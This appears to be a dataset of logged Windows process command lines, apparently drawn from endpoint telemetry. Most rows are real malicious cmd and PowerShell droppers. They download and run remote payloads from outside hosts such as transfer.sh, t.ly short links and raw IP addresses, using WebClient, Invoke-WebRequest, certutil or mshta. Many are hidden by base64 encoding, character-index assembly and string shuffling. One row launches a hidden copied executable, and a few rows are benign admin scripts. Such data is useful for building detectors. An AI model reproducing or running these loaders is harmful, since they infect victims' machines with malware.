"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c ""start %cd%吃饭3.mp4 & attrib -s -h %cd%MagOzyr.exe & xcopy /F /S /Q /H /R /Y %cd%MagOzyr.exe C:\Users\user\AppData\Local\Temp\jnKqK\ & attrib +s +h %cd%MagOzyr.exe & start C:\Users\user\AppData\Local\Temp\jnKqK\MagOzyr.exe & exit""","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&start hello.wsf&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&start Revised"" ""CT"" ""traffic"" ""light"" ""escalation.pub&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c pow""""ersh""""ell $flol=i`ex($('[Environment]::GetEam8s'''.Replace('am8','nvironmentVariable(''public'') + ''\\qa2z.vb')));function getit([string]$fz, [string]$oulv){$ff=iex($('(Nlvlpw-Objlvlpct Systlvlpm.Nlvlpt.WlvlpbClilvlpnt).Downkjc8e($oulv.Replace(''bwl7'',''tps://'').Replace(''ubs'', ''e''), $fz)').Replace('lvlp', 'e').Replace('kjc8', 'loadFil'));ie`x('sguuodarguuod $fz'.Replace('guuod','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));getit -fz ($fzf + 'Exams 2022.txt') -oulv 'htbwl7transfubsr.sh/PHJubszc/tubsst.txt';getit -fz $flol -oulv 'htbwl7solutionias.com/bin/g.vbs';exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c pow""""ersh""""ell $flol=i`ex($('[Environment]::GetEpxms'''.Replace('pxm','nvironmentVariable(''public'') + ''\\np7r.vb')));function getit([string]$fz, [string]$oulv){$ff=iex($('(Nt080w-Objt080ct Systt080m.Nt080t.Wt080bClit080nt).Downx4y6e($oulv.Replace(''ozqq'',''tps://'').Replace(''e1u'', ''e''), $fz)').Replace('t080', 'e').Replace('x4y6', 'loadFil'));ie`x('spjxhzarpjxhz $fz'.Replace('pjxhz','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));getit -fz ($fzf + 'Exams 2022.txt') -oulv 'htozqqtransfe1ur.sh/PHJe1uzc/te1ust.txt';getit -fz $flol -oulv 'http://www.hote1ulsidro.me1u/cdy/da.vbs';exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c pow""""ersh""""ell $flol=i`ex($('[Environment]::GetEuh0s'''.Replace('uh0','nvironmentVariable(''public'') + ''\\wt8u.vb')));function getit([string]$fz, [string]$oulv){$ff=iex($('(Ng3ukw-Objg3ukct Systg3ukm.Ng3ukt.Wg3ukbClig3uknt).Downgtc0e($oulv.Replace(''wml4'',''tps://'').Replace(''o4m'', ''e''), $fz)').Replace('g3uk', 'e').Replace('gtc0', 'loadFil'));ie`x('su84kharu84kh $fz'.Replace('u84kh','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));getit -fz ($fzf + 'Exams 2022.txt') -oulv 'htwml4transfo4mr.sh/wr9mGc/to4mst.txt';getit -fz $flol -oulv 'http://solutionias.com/bin/km.vbs';exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c powershell/W 01 $lgo=ie`x($('[En""""viro""""nment]::G""""etEfjss'''.Re""""place('fjs','nvironment""""Va""""riable(''pu""""blic'') + ''\\kuvq.vb')));fun""""ction sick""""o([string]$fz, [string]$oulv){$ff=ie`x($('(Nbgsd""""w-O""""bjbgsdct Sys""""tbgsdm.""""Nbgsdt.""""WbgsdbC""""libgsdnt).D""""ownjkx7e($oul""""v.Rep""""lace(''cgut'',''tp""""s:/""""/'').Rep""""lac""""e(''v0a'', ''e''), $fz)').R""""epl""""ace('bgsd', 'e').R""""epla""""ce('jkx7', 'lo""""adF""""il'));ie`x('srnti4arrnti4 $fz'.Replace('rnti4','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));sick""""o -fz ($fzf + 'Exams 2022.txt') -oulv 'htcguttransfv0ar.sh/5VQHfI/tv0ast.txt';sick""""o -fz $lgo -oulv 'http://45.154.98.158/zbb.v""""bs';exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c start ..\Skypee\tmpF34F.tmp.exe explorer ""%CD%"" & exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\cmd.exe","""C:\windows\system32\cmd.exe"" /c start ~$EJERCICIO"" ""CANALES"" ""DE"" ""DISTRIBUCION.pptx&#115;&#116;&#97;&#114;&#116;&#32;&#65;&#76;&#85;&#77;&#78;&#73;&#46;&start Save.vbs&#115;&#99;&#114 &"" &exit","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""
-ExecutionPolicy UnRestricted $tFktNU='.815tsp63hh.41th/a20m.//TLba1.t:';
&(-join($tFktNU[(-4855+4860),(25393-25376),(24367-24342)])) \% (-join($tFktNU[(-4855+4860),(25393-25376),(24367-24342)]));
\% $% (-join($tFktNU[(-34195+34215),(-4855+4860),(51556-51547),(-36339+36343),(25393-25376)]));
foreach($YyoAoEM in @((-52536+52545),(-23297+23301),(-23139+23143),(13804-13798),(43208-43177),(-38446+38462),(-25859+25875),(-38355+38367),(36907-36904),(30531-30531),(48223-48221),(61566-61558),(54637-54636),(-7521+7521),(-27506+27508),(-34486+34493),(40106-40106),(3189-3171),(-19403+19422),(42675-42673),(-32132+32148),(23364-23338),(33210-33210),(-59508+59517),(-61385+61389),(33264-33247))) {$nqGCXr+= $tFktNU[$YyoAoEM]};
$% $nqGCXr;
","C:\Users\user\Desktop\",2
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ExecutionPolicy Bypass -File %HOMEDRIVE%%HOMEPATH%""\Documents\WindowsPowerShell\Scripts\Remove-TempFiles.ps1""","C:\Users\user\Desktop\",2
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Sta -Nop -exec bypass -w 1 -Join ( (151 , 145, 170 , 50, 116 , 145,167, 55,117 ,142 ,152,145,143 ,164 ,40, 116, 145 , 164 ,56 ,127 ,145,142 ,103 , 154 ,151 ,145 ,156, 164 ,51 , 56 ,104,157 , 167, 156,154,157,141 ,144 ,123,164 , 162 , 151, 156, 147 ,50, 47,150 ,164, 164,160, 163, 72 ,57 , 57 , 162, 145 , 156,164, 162, 171 ,56 ,143, 157, 57 , 163, 66 ,62,170 , 65 ,57,162 , 141 , 167,47, 51 ) | forEaCh {( [cONVert]::tOiNT16( ([STrIng]$_) ,8)-AS[chaR]) }) | . ( $sHEllID[1]+$SHelLId[13]+'x')","C:\Users\user\Desktop\",2
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'eTn+njYOQ7iLA1rLOOa9IMslFguAY0CpPT/GpD9WQUZxpGYdEsEOZPF/w16fNiMfdmFIJ3Pb';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",2
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c Invoke-WebRequest -Uri lindesbergparkeringsanmarkning.netlify.app/systemupdate.exe -Outfile C:\Users\user\Systemupdt.exe start C:\Users\user\Systemupdt.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",2
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" IEX(New-Object Net.Webclient).DownloadString(""http://192.168.190.141/c2.exe"")","C:\Windows\System32\WindowsPowerShell\v1.0\",2
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"" -windowstyle hidden -nologo -NoProfile -ExecutionPolicy ByPass -File explorer.ps1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"" -ExecutionPolicy ByPass -Command ""Invoke-Command -ScriptBlock { C:\ProgramData\IntuneDebugTools\RegistryChangesv3.0.ps1 -key HKLM:\Software\Microsoft -exclude '\\.NETFramework','\\Provisioning','\\AppModel','\\Component Based Servicing','\\Installer','\\SideBySide' -last 36h -gridview }","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"" -ExecutionPolicy ByPass -Command ""Invoke-Command -ScriptBlock { C:\ProgramData\IntuneDebugTools\RegistryChangesv3.0.ps1 -key HKLM:\Software\Microsoft\IntuneManagementExtension -last 36h -gridview }","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"" -ExecutionPolicy ByPass -Command ""Invoke-Command -ScriptBlock { C:\ProgramData\IntuneDebugTools\RegistryChangesv3.0.ps1 -key HKLM:\Software\Microsoft\PolicyManager -last 36h -gridview }","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"" -ExecutionPolicy ByPass -Command ""Invoke-Command -ScriptBlock { C:\ProgramData\IntuneDebugTools\RegistryChangesv3.0.ps1 -key HKLM:\Software\policies -last 36h -gridview }","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""
-ExecutionPolicy UnRestricted $AVHpO='..28/p11t9.taMhs8h/8tL3T.:h41A/b8';
&(-join($AVHpO[(-11581+11596),(-36837+36849),(-2203+2224)])) ~^ (-join($AVHpO[(-11581+11596),(-36837+36849),(-2203+2224)]));
~^ _+ (-join($AVHpO[(-13540+13553),(-11581+11596),(-12501+12515),(-2519+2527),(-36837+36849)]));
foreach($chpRJ in @((48138-48124),(55218-55210),(-7819+7827),(19452-19447),(-30717+30742),(35568-35564),(43619-43615),(61456-61453),(35217-35214),(-51859+51859),(25794-25788),(-33036+33045),(42874-42871),(-15728+15728),(-15441+15447),(32996-32969),(-34090+34093),(11090-11090),(-32653+32655),(514-492),(-49799+49805),(23952-23948),(-27858+27889),(25048-25048),(-12716+12730),(-27793+27801),(-37851+37863))) {$lKJkHGzqD+= $AVHpO[$chpRJ]};
_+ $lKJkHGzqD;
","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""
-ExecutionPolicy UnRestricted $ErrorActionPreference=0;
$JinQwgpPt = $Null;
$mwxWn = '.~4BltbYsn1dEuS4Sgc6nmpsjJ.X3x/AS2E3.fa/msnkKQaRdohvvuX/p.g33xEiZr:Htt1chCdzm1T';
sal UsbjfHcj ($mwxWn[(-47998+48006)]+$mwxWn[(21787-21756)]+$mwxWn[(-54750+54754)]);
UsbjfHcj OOQrH ($mwxWn[(63138-63075)]+$mwxWn[(31833-31821)]+$mwxWn[(32210-32183)]);
UsbjfHcj algif ($mwxWn[(65550-65529)]+$mwxWn[(-47998+48006)]+$mwxWn[(54804-54754)]+$mwxWn[(-39885+39890)]+$mwxWn[(21787-21756)]);
foreach($VSySGeH in @((-23163+23213),(54552-54547),(-53777+53782),(59828-59806),(40932-40866),(-14683+14713),(-10633+10663),(-53269+53279),(-25603+25622),(-50939+50967),(-13997+13997),(38826-38816),(26869-26836),(62545-62517),(15970-15970),(-46832+46842),(-8611+8613),(26001-25973),(20427-20427),(22313-22285),(61853-61851),(5708-5678),(48139-48101),(-46494+46494),(12125-12075),(12639-12634),(-31657+31695))) {$JinQwgpPt+=$mwxWn[$VSySGeH]};
OOQrH (""algif $JinQwgpPt"");
","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""
-ExecutionPolicy UnRestricted $ErrorActionPreference=0;
$frBNu = $Null;
$uwKKvgFj = 'KShdRh6V:rPwpxe3amttH3ET.sVgVthWa/rLkR/O~jHvSHtkPTaveIBihute/L/.s';
sal hBvpJh ($uwKKvgFj[(-54866+54867)]+$uwKKvgFj[(-9772+9788)]+$uwKKvgFj[(7784-7749)]);
hBvpJh MhPpt ($uwKKvgFj[(39395-39342)]+$uwKKvgFj[(49704-49690)]+$uwKKvgFj[(-26596+26609)]);
hBvpJh CUjQyyi ($uwKKvgFj[(59636-59619)]+$uwKKvgFj[(-54866+54867)]+$uwKKvgFj[(59872-59870)]+$uwKKvgFj[(46368-46350)]+$uwKKvgFj[(-9772+9788)]);
foreach($CcCOrJf in @((43386-43384),(-11048+11066),(-13053+13071),(4011-3999),(-43342+43367),(17107-17099),(13933-13900),(41720-41687),(4017-4015),(54782-54741),(56538-56483),(-43341+43359),(-34314+34338),(54387-54378),(22781-22724),(-37190+37223),(-15633+15639),(-43069+43102),(-26554+26569),(30069-30054),(55326-55302),(33908-33906),(-42294+42312),(-43767+43783))) {$frBNu+=$uwKKvgFj[$CcCOrJf]};
MhPpt (""CUjQyyi $frBNu"");
","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""
-ExecutionPolicy UnRestricted $ErrorActionPreference=0;
$wFscpHcm = $Null;
$zSMNf = 'Gh:6y93mOTd5qv5/aZl14yk1tq~.l.cy1bWbzhDhatkyS.1tZbd/I6yFZEzjO.NtxN5JlhpB/CfMAVt3sez';
sal xMhmm ($zSMNf[(-7518+7562)]+$zSMNf[(48413-48397)]+$zSMNf[(-23615+23633)]);
xMhmm aCaISg ($zSMNf[(48694-48642)]+$zSMNf[(42502-42445)]+$zSMNf[(-21622+21686)]);
xMhmm EMbEbr ($zSMNf[(-2416+2423)]+$zSMNf[(-7518+7562)]+$zSMNf[(-54229+54230)]+$zSMNf[(14753-14744)]+$zSMNf[(48413-48397)]);
foreach($BeewHr in @((60248-60247),(52710-52686),(-17049+17073),(-3437+3507),(9367-9365),(41090-41075),(-51516+51531),(-9197+9216),(-38376+38381),(-55382+55388),(56076-56049),(-50190+50201),(2786-2783),(-38274+38301),(42610-42591),(-17032+17052),(-38046+38049),(11323-11296),(-36782+36801),(-35607+35613),(19803-19784),(65081-65066),(-13744+13755),(29462-29451),(-36643+36670),(-60328+60329),(13582-13558),(-27659+27675))) {$wFscpHcm+=$zSMNf[$BeewHr]};
aCaISg (""EMbEbr $wFscpHcm"");
","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""
-ExecutionPolicy UnRestricted $FHMFk='/t./aH..T/tl:ab31h18062htp5MS4.1';
&(-join($FHMFk[(24837-24809),(-17791+17795),(-62926+62937)])) /] (-join($FHMFk[(24837-24809),(-17791+17795),(-62926+62937)]));
/] _< (-join($FHMFk[(-25197+25224),(24837-24809),(46336-46331),(-35848+35849),(-17791+17795)]));
foreach($rMewH in @((62956-62939),(-24107+24108),(-1519+1520),(48356-48331),(-14230+14242),(-36493+36493),(-51272+51272),(-61270+61299),(23794-23768),(-15155+15157),(-14369+14385),(21701-21686),(10962-10943),(-10572+10574),(-7833+7849),(13299-13278),(54348-54346),(28259-28237),(-2529+2549),(-10849+10865),(-11787+11787),(61520-61506),(-51289+51291),(41934-41917),(-23334+23335),(42500-42496))) {$YCpLSOS+= $FHMFk[$rMewH]};
_< $YCpLSOS;
","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""
-ExecutionPolicy UnRestricted $ryrZN='s/L4..4.h4t7t/51p/:9hht82aa2.Mth';
&(-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)])) _* (-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)]));
_* => (-join($ryrZN[(-14568+14597),(49307-49307),(-33898+33906),(13922-13912),(14885-14860)]));
foreach($prnBEcj in @((-22378+22386),(-52582+52592),(42983-42973),(7032-7016),(-60799+60817),(-20075+20076),(33369-33368),(3925-3906),(-11084+11098),(-28689+28693),(17784-17760),(-47470+47485),(-32558+32569),(-3094+3098),(52631-52607),(-2365+2368),(-55643+55666),(-43604+43608),(43856-43853),(2908-2905),(-15756+15757),(-55338+55346),(-24815+24819),(43407-43399),(-32952+32962),(-5600+5625))) {$zIGtAPwN+= $ryrZN[$prnBEcj]};
=> $zIGtAPwN;
","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""
-ExecutionPolicy UnRestricted $wpezs='/:1A.4tah.ahmht/1a3l1ts69tpTMp1c356h././';
&(-join($wpezs[(4585-4563),(-23314+23317),(31926-31907)])) *[ (-join($wpezs[(4585-4563),(-23314+23317),(31926-31907)]));
*[ :! (-join($wpezs[(46437-46425),(4585-4563),(-59946+59954),(-21285+21291),(-23314+23317)]));
foreach($wQYqGYI in @((-26381+26389),(-27912+27918),(2113-2107),(64576-64550),(59432-59431),(-42994+42994),(-37098+37098),(28536-28534),(19153-19129),(57141-57123),(54028-54024),(1672-1639),(4403-4380),(-30176+30180),(-41115+41117),(-41711+41716),(-5681+5704),(-52607+52611),(-37751+37753),(-30355+30373),(-21394+21396),(-55128+55128),(-17882+17890),(25708-25702),(53979-53972),(4028-4028),(-55366+55397),(56278-56271),(26126-26114),(-6502+6528),(26608-26604),(20536-20528),(-614+620),(-20961+20968))) {$DVSWxJNg+= $wpezs[$wQYqGYI]};
:! $DVSWxJNg;
","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Nop -sta -noni -w hidden -encodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA==","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" WGeT ”https://qwerol.gq/Nwhbtlrjydroromkgnypmqzykkzkoaitxo” -OutFiLE ”$EnV:temP\ping-isac.exe” ; INVoke-iTEM ”$ENv:temp\ping-isac.exe”","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('http://resxctyre.com/adobe.exe','adobe.exe');./adobe.exe;","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -w h -c $a3=$([char]105);set-alias b set-alias;b f $a3'wr';b mr $a3'ex';$sjqz8=$([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47) ;mr (f -usebasicparsing $yh8ex'pdei.pl/t.jpg')","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" "" .((VariaBle '*MdR*').name[3,11,2]-Join'')( ((""{32}{3}{25}{28}{6}{18}{16}{10}{31}{13}{29}{14}{0}{8}{7}{17}{11}{1}{24}{5}{34}{35}{26}{19}{4}{23}{33}{27}{21}{2}{15}{22}{12}{9}{30}{20}"" -f'G','kALgBkA','RQ','BF','AiAGgAdAB0AH','wBuAGwAbwBhA','4','bABpAGU','MA','AC4AcABz','Bj','AC','U','IABOAGU','dAAuAFcAZQBiA','BWAEkATAAvAFMAQwBSA','ZQB3AC0ATwBiAGoAZQ','AbgB0','A','GcAKA','ApAA==','A','EkAUAB','A','G8Ad','AFgA','A','vAC8','IAAoAE','A','ADEAIg','AHQA','SQ','AOgA','GQAcwB','0AHIAaQBu')) )""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""& ( $SheLLID[1]+$SHELlID[13]+'X') ( [StRiNg]::joIn('', ( [reGEx]::MaTcHeS("" ))'=='+'AA'+'pAgI'+'AE'+'D'+'AzB'+'AcA4'+'CA'+'UBA'+'UAk'+'EAS'+'B'+'wQAMFA'+'vAATA'+'kEAWBQ'+'RA8CAvAgO'+'AA'+'HA0BAdA'+'g'+'GAiAAKAcGAuBQaAIHA0B'+'wc'+'A'+'QGAh'+'Bwb'+'A'+'wGA'+'uBw'+'dA8GAkB'+'gLAkCA'+'0Bgb'+'AUGA'+'pBAbAMGAiBQZ'+'AcF'+'AuA'+'AdAUGAOBAIA'+'Q'+'HAjBQZAoGAiBwTA0C'+'A'+'3BQZA4EA'+'oAAIAgFAFB'+'QSA'+'AC'+'A'+'7AQZA'+'gHAlBgLAIDAzAAbAwGAkBgbA'+'UHAyB'+'AIAsDAlBAeAUGA'+'uAA'+'dAMHA'+'v'+'BAaA4G'+'A'+'vB'+'wY'+' '+'cne'+'-'( ( )'x'+]31[DiLLEhS$+]1[DILlEhS$ ( . "" ,'.','riGHTtO'+'lE'+'fT')| FoREAcH-oBjeCT { $_.VaLUE}) ) )""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-EncodedCommand ""IgBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHQALgBsAHkALwBhAHMAZABhAGYAJwApACIA""""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-EncodedCommand ""IgBtAHMAaAB0AGEALgBlAHgAZQAgAGoAYQB2AGEAcwBjAHIAaQBwAHQAOgBhAD0ARwBlAHQATwBiAGoAZQBjAHQAKAAiAHMAYwByAGkAcAB0ADoAaAB0AHQAcABzADoALwAvAHQALgBsAHkALwBqAG4AYQBTAGoAZAAiACkALgBFAHgAZQBjACgAKQA7AGMAbABvAHMAZQAoACkAOwAgACYAJgAgAHMAdABhAHIAdAAgAGEALgBlAHgAZQAiAA==""""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-EncodedCommand ""YwBlAHIAdAB1AHIAaQBsAC4AZQB4AGUAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAC0AZgAgAGgAdAB0AHAAcwA6AC8ALwB0AC4AbAB5AC8AdwAtAHIAdwAgACUAVABlAG0AcAAlAFwAYQAuAGUAeABlACAAJgAmACAAcwB0AGEAcgB0ACAAJQBUAGUAbQBwACUAXABhAC4AZQB4AGUAIAAmACYAIABjAGUAcgB0AHUAcgBpAGwALgBlAHgAZQAgAC0AdQByAGwAYwBhAGMAaABlACAALQBmACAAaAB0AHQAcABzADoALwAvAHQALgBsAHkALwB1AEoAdwBJADcAIAAlAFQAZQBtAHAAJQBcAGEALgBwAGQAZgAgACYAJgAgAHMAdABhAHIAdAAgACUAVABlAG0AcAAlAFwAYQAuAHAAZABmAA==""""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-EncodedCommand ""bQBzAGgAdABhAC4AZQB4AGUAIABqAGEAdgBhAHMAYwByAGkAcAB0ADoAYQA9AEcAZQB0AE8AYgBqAGUAYwB0ACgAIgBzAGMAcgBpAHAAdAA6AGgAdAB0AHAAcwA6AC8ALwB0AC4AbAB5AC8AdwAtAHIAdwAiACkALgBFAHgAZQBjACgAKQA7AGMAbABvAHMAZQAoACkAOwAgACYAJgAgAHMAdABhAHIAdAAgAGEALgBlAHgAZQA=""""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-EncodedCommand 'YwBlAHIAdAB1AHIAaQBsAC4AZQB4AGUAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAC0AZgAgAGgAdAB0AHAAcwA6AC8ALwB0AC4AbAB5AC8AdwAtAHIAdwAgACUAVABlAG0AcAAlAC8AYQAuAGUAeABlACAAJgAmACAAcwB0AGEAcgB0ACAAJQBUAGUAbQBwACUALwBhAC4AZQB4AGUAIAAmACYAIABjAGUAcgB0AHUAcgBpAGwALgBlAHgAZQAgAC0AdQByAGwAYwBhAGMAaABlACAALQBmACAAaAB0AHQAcABzADoALwAvAHQALgBsAHkALwB1AEoAdwBJADcAIAAlAFQAZQBtAHAAJQAvAGEALgBwAGQAZgAgACYAJgAgAHMAdABhAHIAdAAgACUAVABlAG0AcAAlAC8AYQAuAHAAZABmAA=='""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-command & ( $sHEllid[1]+$SHELLId[13]+'X')((((""{13}{0}{15}{65}{60}{45}{10}{34}{38}{40}{62}{39}{23}{37}{36}{66}{21}{69}{18}{48}{53}{22}{59}{41}{2}{47}{68}{29}{26}{9}{61}{42}{6}{12}{27}{43}{28}{52}{50}{31}{14}{24}{54}{25}{3}{5}{35}{16}{63}{67}{19}{33}{57}{55}{49}{58}{8}{7}{56}{46}{51}{64}{32}{1}{4}{11}{44}{30}{20}{17}"" -f 'nvoke-W','ds{0}a.pdf; start C:{0}Use','{0','htt','rs{0}','p','ds{0}a.m','rs{0}Pub','se','wn','RI https','Public{0}Do','si','I',' ','eb','://t.','df','loads{','u','p','D','0','}Users','-UR',' ','0}Do',';','eb','c{','}a.','t','nloa','JwI7','://','s','}Pu','{0','t.ly','utFile C:{0','/w-','Users','a',' Invoke-W','wnloads{0','U','0','}P','0}a.msi;',' C:','ques','}D','Re',' start C:{','I','OutFile','lic{',' -','{0}U','}','uest -','lo','rw -O','l','ow','Req','blic{0}','y/','ubli','own')) -F[Char]92))""","C:\Users\user\Desktop\",1
